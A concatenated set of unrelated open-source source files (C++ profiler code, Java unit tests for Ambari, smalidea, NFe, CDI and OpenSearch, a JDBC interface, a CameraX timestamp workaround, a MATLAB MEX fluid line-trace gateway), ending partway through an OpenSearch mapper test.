instrumented_io_context &io_service_;
/// The runner to run function periodically.
PeriodicalRunner periodical_runner_;
// RPC message containing profiling data. Holds the queue of profile events
// until they are flushed.
std::shared_ptr<rpc::ProfileTableData> rpc_profile_data_ GUARDED_BY(mutex_);
/// Whether a profile flush is already in progress.
bool profile_flush_active_ GUARDED_BY(mutex_) = false;
// Client to the GCS used to push profile events to it.
std::shared_ptr<gcs::GcsClient> gcs_client_;
};
class ProfileEvent {
public:
ProfileEvent(const std::shared_ptr<Profiler> &profiler, const std::string &event_type);
// Set the end time for the event and add it to the profiler.
~ProfileEvent() {
rpc_event_.set_end_time(absl::GetCurrentTimeNanos() / 1e9);
profiler_->AddEvent(rpc_event_);
}
// Set extra metadata for the event, which could change during the event.
void SetExtraData(const std::string &extra_data) {
rpc_event_.set_extra_data(extra_data);
}
private:
// shared_ptr to the profiler that this event will be added to when it is destructed.
std::shared_ptr<Profiler> profiler_;
// Underlying proto data structure that holds the event data.
rpc::ProfileTableData::ProfileEvent rpc_event_;
};
} // namespace worker
} // namespace core
} // namespace ray
| 924 |
1,664 | <reponame>likenamehaojie/Apache-Ambari-ZH
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.ambari.server.utils;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collection;
import java.util.HashSet;
import java.util.List;
import java.util.Set;
import java.util.regex.Pattern;
import org.junit.Test;
import com.google.gson.JsonElement;
import com.google.gson.JsonParser;
import junit.framework.Assert;
/**
* Complementary class used in tests to check if string representation corresponds to Set/Map
*/
public class CollectionPresentationUtils {
/**
* Checks if string representation corresponds to the collection. Parts of an expected collection should not contain
* delimiter.
*/
public static boolean isStringPermutationOfCollection(String input, Collection<String> expected, String delimeter,
int trimFromStart, int trimFromEnd) {
input = input.substring(trimFromStart, input.length() - trimFromEnd);
List<String> parts = new ArrayList<>(Arrays.asList(input.split(Pattern.quote(delimeter))));
for (String part : expected) {
if (parts.contains(part)) {
parts.remove(part);
}
}
return parts.isEmpty();
}
public static boolean isJsonsEquals(String input1, String input2) {
JsonParser parser = new JsonParser();
JsonElement input1Parsed = parser.parse(input1);
JsonElement input2Parsed = parser.parse(input2);
return input1Parsed.equals(input2Parsed);
}
@Test
public void testIsStringPermutationOfCollection() {
String input1 = "{\"foo\":\"bar\",\"foobar\":\"baz\"}";
String input2 = "{\"foobar\":\"baz\",\"foo\":\"bar\"}";
String input3 = "{\"fooba\":\"baz\",\"foo\":\"bar\"}";
Set<String> expected = new HashSet<>(Arrays.asList(new String[]{"\"foo\":\"bar\"", "\"foobar\":\"baz\""}));
Assert.assertTrue(CollectionPresentationUtils.isStringPermutationOfCollection(input1, expected, ",", 1, 1));
Assert.assertTrue(CollectionPresentationUtils.isStringPermutationOfCollection(input2, expected, ",", 1, 1));
Assert.assertFalse(CollectionPresentationUtils.isStringPermutationOfCollection(input3, expected, ",", 1, 1));
}
}
| 971 |
480 | /*
* Copyright [2013-2021], Alibaba Group Holding Limited
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.alibaba.polardbx.common.jdbc;
import com.alibaba.polardbx.common.lock.LockingFunctionHandle;
import java.sql.Connection;
import java.sql.SQLException;
import java.util.List;
import java.util.Map;
import java.util.concurrent.Executor;
public interface IConnection extends Connection {
void kill() throws SQLException;
long getLastInsertId();
void setLastInsertId(long id);
long getReturnedLastInsertId();
void setReturnedLastInsertId(long id);
List<Long> getGeneratedKeys();
void setGeneratedKeys(List<Long> ids);
ITransactionPolicy getTrxPolicy();
void setTrxPolicy(ITransactionPolicy trxPolicy);
BatchInsertPolicy getBatchInsertPolicy(Map<String, Object> extraCmds);
void setBatchInsertPolicy(BatchInsertPolicy policy);
void setEncoding(String encoding) throws SQLException;
String getEncoding();
void setSqlMode(String sqlMode);
String getSqlMode();
void setStressTestValid(boolean stressTestValid);
boolean isStressTestValid();
@Override
void setNetworkTimeout(Executor executor, int milliseconds) throws SQLException;
@Override
int getNetworkTimeout() throws SQLException;
Map<String, Object> getServerVariables();
void setServerVariables(Map<String, Object> serverVariables) throws SQLException;
default void setGlobalServerVariables(Map<String, Object> GlobalServerVariables) throws SQLException {
}
default void setConnectionVariables(Map<String, Object> connectionVariables) throws SQLException {
}
long getFoundRows();
void setFoundRows(long foundRows);
long getAffectedRows();
void setAffectedRows(long affectedRows);
String getUser();
void setUser(String userName);
void executeLater(String sql) throws SQLException;
void flushUnsent() throws SQLException;
default long getId() {
return 0L;
}
default LockingFunctionHandle getLockHandle(Object object) {
return null;
}
default ConnectionStats getConnectionStats() {
return null;
}
default IConnection getRealConnection() {
return this;
}
default int getReadViewId() {
return -1;
}
default void setReadViewId(int readViewId) {
throw new UnsupportedOperationException("Connection does not support read view id.");
}
}
| 956 |
3,799 | <filename>camera/camera-video/src/main/java/androidx/camera/video/internal/workaround/CorrectVideoTimeByTimebase.java
/*
* Copyright 2021 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package androidx.camera.video.internal.workaround;
import android.media.MediaCodec;
import android.os.SystemClock;
import androidx.annotation.NonNull;
import androidx.annotation.Nullable;
import androidx.annotation.RequiresApi;
import androidx.camera.core.Logger;
import androidx.camera.video.internal.compat.quirk.CameraUseInconsistentTimebaseQuirk;
import java.util.concurrent.TimeUnit;
import java.util.concurrent.atomic.AtomicBoolean;
/**
* Corrects the video timestamps if video buffer contains REALTIME timestamp.
*
* <p>As described on b/197805856, some Samsung devices use inconsistent timebase for camera
* frame. The workaround detects and corrects the timestamp by generating a new timestamp.
* Note: this will sacrifice the precise timestamp of video buffer.
*
* @see CameraUseInconsistentTimebaseQuirk
*/
@RequiresApi(21) // TODO(b/200306659): Remove and replace with annotation on package-info.java
public class CorrectVideoTimeByTimebase {
private static final String TAG = "CorrectVideoTimeByTimebase";
@Nullable
private AtomicBoolean mNeedToCorrectVideoTimebase = null;
/**
* Corrects the video timestamp if necessary.
*
* <p>This method will modify the {@link MediaCodec.BufferInfo#presentationTimeUs} if necessary.
*
* @param bufferInfo the buffer info.
*/
public void correctTimestamp(@NonNull MediaCodec.BufferInfo bufferInfo) {
// For performance concern, only check the requirement once.
if (mNeedToCorrectVideoTimebase == null) {
// Skip invalid buffer
if (bufferInfo.size <= 0 || bufferInfo.presentationTimeUs <= 0L
|| (bufferInfo.flags & MediaCodec.BUFFER_FLAG_CODEC_CONFIG) != 0) {
return;
}
long uptimeUs = TimeUnit.MILLISECONDS.toMicros(SystemClock.uptimeMillis());
long realtimeUs = TimeUnit.MILLISECONDS.toMicros(SystemClock.elapsedRealtime());
// Expected to be uptime
boolean closeToRealTime = Math.abs(bufferInfo.presentationTimeUs - realtimeUs)
< Math.abs(bufferInfo.presentationTimeUs - uptimeUs);
if (closeToRealTime) {
Logger.w(TAG, "Detected video buffer timestamp is close to real time.");
}
mNeedToCorrectVideoTimebase = new AtomicBoolean(closeToRealTime);
}
if (mNeedToCorrectVideoTimebase.get()) {
bufferInfo.presentationTimeUs -= TimeUnit.MILLISECONDS.toMicros(
SystemClock.elapsedRealtime() - SystemClock.uptimeMillis());
}
}
}
| 1,164 |
1,914 | {
"$class": "org.acme.sample.SampleParticipant",
"participantId": "CONGA",
"firstName": "Conga",
"lastName": "Block"
} | 50 |
666 | package com.didispace.scca.rest.dto;
import com.didispace.scca.rest.domain.Permission;
import lombok.Data;
import lombok.NoArgsConstructor;
import java.util.List;
@Data
@NoArgsConstructor
public class PermissionParamDto {
/**
* 用户 ID
*/
private Long userId;
/**
* 权限列表
*/
List<Permission> permissions;
}
| 155 |
401 | <filename>src/test/java/org/jf/smalidea/SmaliClassTypeElementTest.java
/*
* Copyright 2014, Google Inc.
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are
* met:
*
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above
* copyright notice, this list of conditions and the following disclaimer
* in the documentation and/or other materials provided with the
* distribution.
* * Neither the name of Google Inc. nor the names of its
* contributors may be used to endorse or promote products derived from
* this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
* A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
* OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
* SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
* LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
* OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
package org.jf.smalidea;
import com.intellij.testFramework.fixtures.LightCodeInsightFixtureTestCase;
import org.jf.smalidea.psi.impl.SmaliClass;
import org.jf.smalidea.psi.impl.SmaliClassType;
import org.jf.smalidea.psi.impl.SmaliClassTypeElement;
import org.jf.smalidea.psi.impl.SmaliFile;
import org.junit.Assert;
public class SmaliClassTypeElementTest extends LightCodeInsightFixtureTestCase {
public void testGetType() {
myFixture.addFileToProject("my/blarg.smali",
".class public Lmy/blarg; " +
".super Ljava/lang/Object;");
String text = ".class public Lmy/pkg/blah; " +
".super Lmy/bl<ref>arg;";
SmaliFile file = (SmaliFile)myFixture.addFileToProject("my/pkg/blah.smali",
text.replace("<ref>", ""));
SmaliClassTypeElement typeElement =
(SmaliClassTypeElement)file.findReferenceAt(text.indexOf("<ref>"));
Assert.assertNotNull(typeElement);
SmaliClassType type = typeElement.getType();
Assert.assertEquals("blarg", typeElement.getName());
Assert.assertEquals("my.blarg", typeElement.getCanonicalText());
Assert.assertEquals("blarg", type.getClassName());
Assert.assertEquals("my.blarg", type.getCanonicalText());
SmaliClass resolvedClass = (SmaliClass)typeElement.resolve();
Assert.assertNotNull(resolvedClass);
Assert.assertEquals("my.blarg", resolvedClass.getQualifiedName());
resolvedClass = (SmaliClass)type.resolve();
Assert.assertNotNull(resolvedClass);
Assert.assertEquals("my.blarg", resolvedClass.getQualifiedName());
}
public void testSimpleInnerClass() {
myFixture.addFileToProject("Outer.java", "" +
"public class Outer {" +
" public static class Inner {" +
" }" +
"}");
String text = ".class public Lsmali; " +
".super LOuter$In<ref>ner;";
SmaliFile file = (SmaliFile)myFixture.addFileToProject("smali.smali", text.replace("<ref>", ""));
SmaliClassTypeElement typeElement =
(SmaliClassTypeElement)file.findReferenceAt(text.indexOf("<ref>"));
Assert.assertNotNull(typeElement);
SmaliClassType type = typeElement.getType();
Assert.assertEquals("Outer.Inner", typeElement.getQualifiedName());
Assert.assertEquals("Outer.Inner", type.getCanonicalText());
}
public void testInnerClassWithPackage() {
myFixture.addFileToProject("my/Outer.java", "" +
"package my;" +
"public class Outer {" +
" public static class Inner {" +
" }" +
"}");
String text = ".class public Lsmali; " +
".super Lmy/Outer$In<ref>ner;";
SmaliFile file = (SmaliFile)myFixture.addFileToProject("smali.smali", text.replace("<ref>", ""));
SmaliClassTypeElement typeElement =
(SmaliClassTypeElement)file.findReferenceAt(text.indexOf("<ref>"));
Assert.assertNotNull(typeElement);
SmaliClassType type = typeElement.getType();
Assert.assertEquals("my.Outer.Inner", typeElement.getQualifiedName());
Assert.assertEquals("my.Outer.Inner", type.getCanonicalText());
}
public void testComplexInnerClass() {
myFixture.addFileToProject("my/Outer$blah.java", "" +
"package my;" +
"public class Outer$blah {" +
" public static class Inner {" +
" }" +
" public static class Inner$blah {" +
" }" +
"}");
String text = ".class public Lsmali; " +
".super Lmy/Outer$blah$In<ref>ner$blah;";
SmaliFile file = (SmaliFile)myFixture.addFileToProject("smali.smali", text.replace("<ref>", ""));
SmaliClassTypeElement typeElement =
(SmaliClassTypeElement)file.findReferenceAt(text.indexOf("<ref>"));
Assert.assertNotNull(typeElement);
SmaliClassType type = typeElement.getType();
Assert.assertEquals("my.Outer$blah.Inner$blah", typeElement.getQualifiedName());
Assert.assertEquals("my.Outer$blah.Inner$blah", type.getCanonicalText());
text = ".class public Lsmali2; " +
".super Lmy/Outer$blah$In<ref>ner;";
file = (SmaliFile)myFixture.addFileToProject("smali2.smali", text.replace("<ref>", ""));
typeElement = (SmaliClassTypeElement)file.findReferenceAt(text.indexOf("<ref>"));
Assert.assertNotNull(typeElement);
type = typeElement.getType();
Assert.assertEquals("my.Outer$blah.Inner", typeElement.getQualifiedName());
Assert.assertEquals("my.Outer$blah.Inner", type.getCanonicalText());
}
public void testInnerClassTrailingDollar() {
myFixture.addFileToProject("my/Outer$blah.java", "" +
"package my;" +
"public class Outer$ {" +
" public static class Inner$ {" +
" }" +
"}");
String text = ".class public Lsmali; " +
".super Lmy/Outer$$In<ref>ner$;";
SmaliFile file = (SmaliFile)myFixture.addFileToProject("smali.smali", text.replace("<ref>", ""));
SmaliClassTypeElement typeElement =
(SmaliClassTypeElement)file.findReferenceAt(text.indexOf("<ref>"));
Assert.assertNotNull(typeElement);
SmaliClassType type = typeElement.getType();
Assert.assertEquals("my.Outer$.Inner$", typeElement.getQualifiedName());
Assert.assertEquals("my.Outer$.Inner$", type.getCanonicalText());
}
}
| 3,070 |
568 | <reponame>arthurrib/nfe<gh_stars>100-1000
package com.fincatto.documentofiscal.nfe.classes.distribuicao;
import com.fincatto.documentofiscal.DFAmbiente;
import com.fincatto.documentofiscal.DFUnidadeFederativa;
import org.junit.Assert;
import org.junit.Test;
public class NFDistribuicaoIntTest {
@Test
public void deveGerarAmbienteHomologacao() {
final NFDistribuicaoInt distribuicaoInt = new NFDistribuicaoInt();
distribuicaoInt.setAmbiente(DFAmbiente.HOMOLOGACAO);
Assert.assertEquals(DFAmbiente.HOMOLOGACAO, distribuicaoInt.getAmbiente());
}
@Test(expected = IllegalStateException.class)
public void naoDeveAceitarVersaoNula(){
final NFDistribuicaoInt distribuicaoInt = new NFDistribuicaoInt();
distribuicaoInt.setAmbiente(DFAmbiente.HOMOLOGACAO);
distribuicaoInt.toString();
}
@Test
public void deveGerarVersao100() {
final NFDistribuicaoInt distribuicaoInt = new NFDistribuicaoInt();
distribuicaoInt.setVersao("1.00");
Assert.assertEquals("1.00", distribuicaoInt.getVersao());
}
public void deveGerarConsultaDaBA(){
final NFDistribuicaoInt distribuicaoInt = new NFDistribuicaoInt();
distribuicaoInt.setUnidadeFederativaAutor(DFUnidadeFederativa.BA);
Assert.assertEquals(DFUnidadeFederativa.BA, distribuicaoInt.getUnidadeFederativaAutor());
}
@Test
public void deveGerarXmlCorretamente() {
final NFDistribuicaoInt distribuicaoInt = new NFDistribuicaoInt();
distribuicaoInt.setAmbiente(DFAmbiente.HOMOLOGACAO);
distribuicaoInt.setCnpj("00000000000000");
distribuicaoInt.setVersao("1.00");
distribuicaoInt.setConsultaChaveAcesso(new NFDistribuicaoConsultaChaveAcesso().setChaveAcesso("12345678901234567890123456789012345678901234"));
final String retorno = "<distDFeInt versao=\"1.00\" xmlns=\"http://www.portalfiscal.inf.br/nfe\"><tpAmb>2</tpAmb><CNPJ>00000000000000</CNPJ><consChNFe><chNFe>12345678901234567890123456789012345678901234</chNFe></consChNFe></distDFeInt>";
Assert.assertEquals(retorno, distribuicaoInt.toString());
}
}
| 963 |
765 | // Copyright 2016 Google Inc, NYU.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
#include <stdio.h>
#include <string>
#include "stdint.h"
#include <math.h>
#include <memory>
#include "mex.h"
#define MATLAB_BUILD
#define TH_CONCAT_4(x,y,z,w) TH_CONCAT_4_EXPAND(x,y,z,w)
#define TH_CONCAT_4_EXPAND(x,y,z,w) x ## y ## z ## w
#define TH_CONCAT_3(x,y,z) TH_CONCAT_3_EXPAND(x,y,z)
#define TH_CONCAT_3_EXPAND(x,y,z) x ## y ## z
#define THTensor TH_CONCAT_3(TH,Real,Tensor)
#define THTensor_(NAME) TH_CONCAT_4(TH,Real,Tensor_,NAME)
#define torch_(NAME) TH_CONCAT_3(torch_, Real, NAME)
#define torch_Tensor TH_CONCAT_STRING_3(torch., Real, Tensor)
#define tfluids_(NAME) TH_CONCAT_3(tfluids_, Real, NAME)
#define real float
#define accreal double
#define Real Float
#define THInf FLT_MAX
#define TH_REAL_IS_FLOAT
#define __host__
#define __device__
void THError(const char* c_str) {
mexErrMsgIdAndTxt("MATLAB:CalcLineTrace:error", c_str);
}
// Create our own fake tensor class.
typedef struct THTensor {
std::unique_ptr<long[]> size;
std::unique_ptr<long[]> stride;
int nDimension;
std::unique_ptr<real[]> storage;
} THTensor;
real* THTensor_(data)(const THTensor* self) {
return self->storage.get();
}
#include "generic/stack_trace.cc"
#include "generic/int3.cu.h"
inline int32_t clamp(const int32_t x, const int32_t low, const int32_t high) {
return std::max<int32_t>(std::min<int32_t>(x, high), low);
}
#include "generic/vec3.cc"
#include "third_party/cell_type.h"
#include "third_party/grid.cc"
#include "calc_line_trace.cc"
using namespace std;
#define mexAssert(cond, str) \
{ \
if (!(cond)) { \
mexErrMsgIdAndTxt("MATLAB:CalcLineTrace:failedAssertion", str); \
} \
}
void getVec3(const mxArray* prhs, tfluids_(vec3)* pos) {
mexAssert(mxGetNumberOfDimensions(prhs) == 2, "ERROR: vector not 2D");
const mwSize* sz = mxGetDimensions(prhs);
mexAssert(sz[0] == 1 && sz[1] == 3, "ERROR: vector not size [1, 3]");
const double* posMat = mxGetPr(prhs);
pos->x = posMat[0];
pos->y = posMat[1];
pos->z = posMat[2];
}
void getInt3(const mxArray* prhs, Int3* pos) {
mexAssert(mxGetNumberOfDimensions(prhs) == 2, "ERROR: vector not 2D");
const mwSize* sz = mxGetDimensions(prhs);
mexAssert(sz[0] == 1 && sz[1] == 3, "ERROR: vector not size [1, 3]");
const double* posMat = mxGetPr(prhs);
pos->x = static_cast<int>(posMat[0]);
pos->y = static_cast<int>(posMat[1]);
pos->z = static_cast<int>(posMat[2]);
}
// The gateway function
void mexFunction(int nlhs, mxArray *plhs[], int nrhs, const mxArray *prhs[]) {
// Only 5 inputs allowed
if (nrhs != 4) {
mexErrMsgIdAndTxt("MATLAB:CalcLineTrace:invalidNumInputs",
"Input must be pos, delta, dims, obs");
}
// input must be pos, delta, dims, obs.
for (int i = 0; i < 4; i++) {
if (mxIsDouble(prhs[i]) != 1) {
mexErrMsgIdAndTxt("MATLAB:CalcLineTrace:notDouble",
"Inputs must be double.");
}
}
// Check that the inputs are the right size.
// 0: pos
tfluids_(vec3) pos;
getVec3(prhs[0], &pos);
// mexPrintf("pos = %f %f %f\n", pos.x, pos.y, pos.z);
// 1: delta
tfluids_(vec3) delta;
getVec3(prhs[1], &delta);
// mexPrintf("delta = %f %f %f\n", delta.x, delta.y, delta.z);
// 2: dims
Int3 dims;
getInt3(prhs[2], &dims);
// mexPrintf("dims = %d %d %d\n", dims.x, dims.y, dims.z);
// 3: obs
const int obs_dim = static_cast<int>(mxGetNumberOfDimensions(prhs[3]));
mexAssert(obs_dim == 3 || obs_dim == 2, "ERROR: obs not 3D or 2D");
const mwSize* sz = mxGetDimensions(prhs[3]);
if (obs_dim == 2) {
mexAssert(sz[0] == dims.x, "ERROR: obs size mismatch.");
mexAssert(sz[1] == dims.y, "ERROR: obs size mismatch.");
} else {
mexAssert(sz[0] == dims.x, "ERROR: obs size mismatch.");
mexAssert(sz[1] == dims.y, "ERROR: obs size mismatch.");
mexAssert(sz[2] == dims.z, "ERROR: obs size mismatch.");
}
const double* obs = mxGetPr(prhs[3]);
// Convert the obs to a flag grid.
THTensor flags_tensor; // Create a fake tensor.
flags_tensor.nDimension = 5;
flags_tensor.size.reset(new long[flags_tensor.nDimension]);
flags_tensor.stride.reset(new long[flags_tensor.nDimension]);
flags_tensor.size[0] = 1; // batch
flags_tensor.size[1] = 1; // chan
flags_tensor.size[2] = dims.z;
flags_tensor.size[3] = dims.y;
flags_tensor.size[4] = dims.x;
flags_tensor.stride[4] = 1;
flags_tensor.stride[3] = dims.x;
flags_tensor.stride[2] = dims.x * dims.y;
flags_tensor.stride[1] = dims.x * dims.y * dims.z;
flags_tensor.stride[0] = dims.x * dims.y * dims.z * 1;
flags_tensor.storage.reset(new real[dims.z * dims.y * dims.x]);
for (int k = 0; k < dims.z; k++) {
for (int j = 0; j < dims.y; j++) {
for (int i = 0; i < dims.x; i++) {
const int index = k * dims.x * dims.y + j * dims.x + i;
if (obs[index] > 0) {
flags_tensor.storage[index] = TypeObstacle;
} else {
flags_tensor.storage[index] = TypeFluid;
}
}
}
}
bool is_3d = dims.z > 1;
tfluids_(FlagGrid) flags(&flags_tensor, is_3d);
// Call the actual C function.
tfluids_(vec3) new_pos;
const int32_t ibatch = 0;
const bool do_trace = true;
const bool collided = calcLineTrace(pos, delta, flags, ibatch, &new_pos,
do_trace);
// Only 2 outputs allowed
if (nlhs != 2) {
mexErrMsgIdAndTxt("MATLAB:CalcLineTrace:invalidNumOutputs",
"Two outputs required: [collide, new_pos].");
}
// Allocate the outputs and set them.
plhs[0] = mxCreateDoubleScalar(static_cast<double>(collided));
plhs[1] = mxCreateDoubleMatrix(1, 3, mxREAL);
double* new_pos_mex = mxGetPr(plhs[1]);
new_pos_mex[0] = new_pos.x;
new_pos_mex[1] = new_pos.y;
new_pos_mex[2] = new_pos.z;
}
| 2,772 |
2,150 | package org.javaee7.cdi.alternatives.priority;
import org.jboss.arquillian.container.test.api.Deployment;
import org.jboss.arquillian.junit.Arquillian;
import org.jboss.shrinkwrap.api.Archive;
import org.jboss.shrinkwrap.api.ShrinkWrap;
import org.jboss.shrinkwrap.api.spec.JavaArchive;
import org.junit.Test;
import org.junit.runner.RunWith;
import javax.enterprise.inject.spi.Bean;
import javax.enterprise.inject.spi.BeanManager;
import javax.inject.Inject;
import java.util.Set;
import static org.junit.Assert.assertTrue;
/**
* @author <NAME>
*/
@RunWith(Arquillian.class)
public class MixedGreetingTest {
@Deployment
public static Archive<?> deploy() {
return ShrinkWrap.create(JavaArchive.class)
.addClasses(Greeting.class, SimpleGreeting.class, FancyGreeting.class)
.addAsManifestResource("beans-alternatives.xml", "beans.xml");
}
@Inject
BeanManager beanManager;
@Test
public void should_be_ambiguous() throws Exception {
Set<Bean<?>> beans = beanManager.getBeans(Greeting.class);
assertTrue(beans.size() == 2);
}
}
| 442 |
4,822 | <reponame>gaiksaya/OpenSearch<gh_stars>1000+
/*
* SPDX-License-Identifier: Apache-2.0
*
* The OpenSearch Contributors require contributions made to
* this file be licensed under the Apache-2.0 license or a
* compatible open source license.
*/
/*
* Licensed to Elasticsearch under one or more contributor
* license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright
* ownership. Elasticsearch licenses this file to you under
* the Apache License, Version 2.0 (the "License"); you may
* not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
/*
* Modifications Copyright OpenSearch Contributors. See
* GitHub history for details.
*/
package org.opensearch.index.mapper;
import org.apache.lucene.index.DocValuesType;
import org.apache.lucene.index.IndexableField;
import org.opensearch.common.Strings;
import org.opensearch.common.bytes.BytesReference;
import org.opensearch.common.xcontent.XContentBuilder;
import org.opensearch.common.xcontent.XContentFactory;
import org.opensearch.common.xcontent.XContentType;
import org.opensearch.plugins.Plugin;
import java.io.IOException;
import java.util.Arrays;
import java.util.Collection;
import java.util.List;
import static java.util.Collections.singletonList;
import static org.hamcrest.Matchers.containsString;
public class ScaledFloatFieldMapperTests extends MapperTestCase {
@Override
protected Collection<? extends Plugin> getPlugins() {
return singletonList(new MapperExtrasPlugin());
}
@Override
protected void writeFieldValue(XContentBuilder builder) throws IOException {
builder.value(123);
}
@Override
protected void minimalMapping(XContentBuilder b) throws IOException {
b.field("type", "scaled_float").field("scaling_factor", 10.0);
}
@Override
protected void registerParameters(ParameterChecker checker) throws IOException {
checker.registerConflictCheck("scaling_factor", fieldMapping(this::minimalMapping), fieldMapping(b -> {
b.field("type", "scaled_float");
b.field("scaling_factor", 5.0);
}));
checker.registerConflictCheck("doc_values", b -> b.field("doc_values", false));
checker.registerConflictCheck("index", b -> b.field("index", false));
checker.registerConflictCheck("store", b -> b.field("store", true));
checker.registerConflictCheck("null_value", b -> b.field("null_value", 1));
checker.registerUpdateCheck(b -> b.field("coerce", false), m -> assertFalse(((ScaledFloatFieldMapper) m).coerce()));
checker.registerUpdateCheck(
b -> b.field("ignore_malformed", true),
m -> assertTrue(((ScaledFloatFieldMapper) m).ignoreMalformed())
);
}
public void testExistsQueryDocValuesDisabled() throws IOException {
MapperService mapperService = createMapperService(fieldMapping(b -> {
minimalMapping(b);
b.field("doc_values", false);
}));
assertExistsQuery(mapperService);
assertParseMinimalWarnings();
}
public void testDefaults() throws Exception {
XContentBuilder mapping = fieldMapping(b -> b.field("type", "scaled_float").field("scaling_factor", 10.0));
DocumentMapper mapper = createDocumentMapper(mapping);
assertEquals(Strings.toString(mapping), mapper.mappingSource().toString());
ParsedDocument doc = mapper.parse(source(b -> b.field("field", 123)));
IndexableField[] fields = doc.rootDoc().getFields("field");
assertEquals(2, fields.length);
IndexableField pointField = fields[0];
assertEquals(1, pointField.fieldType().pointDimensionCount());
assertFalse(pointField.fieldType().stored());
assertEquals(1230, pointField.numericValue().longValue());
IndexableField dvField = fields[1];
assertEquals(DocValuesType.SORTED_NUMERIC, dvField.fieldType().docValuesType());
assertEquals(1230, dvField.numericValue().longValue());
assertFalse(dvField.fieldType().stored());
}
public void testMissingScalingFactor() {
Exception e = expectThrows(
MapperParsingException.class,
() -> createMapperService(fieldMapping(b -> b.field("type", "scaled_float")))
);
assertThat(e.getMessage(), containsString("Failed to parse mapping [_doc]: Field [scaling_factor] is required"));
}
public void testIllegalScalingFactor() {
Exception e = expectThrows(
MapperParsingException.class,
() -> createMapperService(fieldMapping(b -> b.field("type", "scaled_float").field("scaling_factor", -1)))
);
assertThat(e.getMessage(), containsString("[scaling_factor] must be a positive number, got [-1.0]"));
}
public void testNotIndexed() throws Exception {
DocumentMapper mapper = createDocumentMapper(
fieldMapping(b -> b.field("type", "scaled_float").field("index", false).field("scaling_factor", 10.0))
);
ParsedDocument doc = mapper.parse(
new SourceToParse(
"test",
"_doc",
"1",
BytesReference.bytes(XContentFactory.jsonBuilder().startObject().field("field", 123).endObject()),
XContentType.JSON
)
);
IndexableField[] fields = doc.rootDoc().getFields("field");
assertEquals(1, fields.length);
IndexableField dvField = fields[0];
assertEquals(DocValuesType.SORTED_NUMERIC, dvField.fieldType().docValuesType());
assertEquals(1230, dvField.numericValue().longValue());
}
public void testNoDocValues() throws Exception {
DocumentMapper mapper = createDocumentMapper(
fieldMapping(b -> b.field("type", "scaled_float").field("doc_values", false).field("scaling_factor", 10.0))
);
ParsedDocument doc = mapper.parse(
new SourceToParse(
"test",
"_doc",
"1",
BytesReference.bytes(XContentFactory.jsonBuilder().startObject().field("field", 123).endObject()),
XContentType.JSON
)
);
IndexableField[] fields = doc.rootDoc().getFields("field");
assertEquals(1, fields.length);
IndexableField pointField = fields[0];
assertEquals(1, pointField.fieldType().pointDimensionCount());
assertEquals(1230, pointField.numericValue().longValue());
}
public void testStore() throws Exception {
DocumentMapper mapper = createDocumentMapper(
fieldMapping(b -> b.field("type", "scaled_float").field("store", true).field("scaling_factor", 10.0))
);
ParsedDocument doc = mapper.parse(
new SourceToParse(
"test",
"_doc",
"1",
BytesReference.bytes(XContentFactory.jsonBuilder().startObject().field("field", 123).endObject()),
XContentType.JSON
)
);
IndexableField[] fields = doc.rootDoc().getFields("field");
assertEquals(3, fields.length);
IndexableField pointField = fields[0];
assertEquals(1, pointField.fieldType().pointDimensionCount());
